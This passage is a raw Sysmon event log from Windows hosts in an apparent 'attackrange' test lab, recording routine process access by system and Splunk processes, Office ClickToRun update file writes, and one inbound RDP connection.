Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9935536CE0E5F80F93BB2187AB7D584E,SHA256=B5FF76B740F3653E87879BF3FA956B14E0AB45F91D2BB27990B5F798B3A6E44A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049374Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.149{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB04-607E-CF06-00000000BB01}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049373Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.149{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049372Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.149{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049371Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.149{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049370Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.149{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049369Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.149{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049368Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.149{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049367Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.149{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049366Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.149{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049365Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.149{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049364Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.149{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-EB04-607E-CF06-00000000BB01}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049363Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.149{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB04-607E-CF06-00000000BB01}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049362Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.150{85C0FFC9-EB04-607E-CF06-00000000BB01}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000063560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\vccorlib140.dll2021-04-20 14:53:57.784 11241100x800000000000000063559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\vcruntime140.dll2021-04-20 14:53:57.784 11241100x800000000000000063558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll2021-04-20 14:53:57.784 11241100x800000000000000063557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\JitV.dll2021-04-20 14:53:57.784 11241100x800000000000000063556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\msvcp140.dll2021-04-20 14:53:57.784 354300x800000000000000063555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:56.378{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-4728-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 11241100x800000000000000063554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.769{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\msvcr120.dll2021-04-20 14:53:57.769 11241100x800000000000000063553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.769{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\ucrtbase.dll2021-04-20 14:53:57.769 11241100x800000000000000063552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.753{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-localization-l1-2-0.dll2021-04-20 14:53:57.753 11241100x800000000000000063551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.753{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\vcruntime140_1.dll2021-04-20 14:53:57.753 11241100x800000000000000063550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.753{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\FREN\MSB1FREN.DLL2021-04-20 14:53:57.753 11241100x800000000000000063549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.753{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO.DLL2021-04-20 14:53:57.753 11241100x800000000000000063548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\C2R64.dll2021-04-20 14:53:57.675 11241100x800000000000000063547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AppvIsvSubsystems64.dll2021-04-20 14:53:57.675 11241100x800000000000000063546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msproof7.dll2021-04-20 14:53:57.659 11241100x800000000000000063545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSPUB.EXE2021-04-20 14:53:57.581 11241100x800000000000000063544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.550{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OART.DLL2021-04-20 14:53:57.550 11241100x800000000000000063543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.472{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pj11icon.exe2021-04-20 14:53:57.472 11241100x800000000000000063542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.472{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\wordicon.exe2021-04-20 14:53:57.472 11241100x800000000000000063541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pptico.exe2021-04-20 14:53:57.456 11241100x800000000000000063540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.441{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pubs.exe2021-04-20 14:53:57.441 11241100x800000000000000063539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.441{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\sscicons.exe2021-04-20 14:53:57.441 11241100x800000000000000063538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.441{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\oregres.dll2021-04-20 14:53:57.441 11241100x800000000000000063537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.441{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\accicons.exe2021-04-20 14:53:57.441 11241100x800000000000000063536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\dbcicons.exe2021-04-20 14:53:57.425 11241100x800000000000000063535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\grv_icons.exe2021-04-20 14:53:57.425 11241100x800000000000000063534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\joticon.exe2021-04-20 14:53:57.425 11241100x800000000000000063533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.394{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msspell7.dll2021-04-20 14:53:57.394 11241100x800000000000000063532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.394{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CSS7DATA0009.DLL2021-04-20 14:53:57.394 11241100x800000000000000063531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CSS7DATA000A.DLL2021-04-20 14:53:57.378 11241100x800000000000000063530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 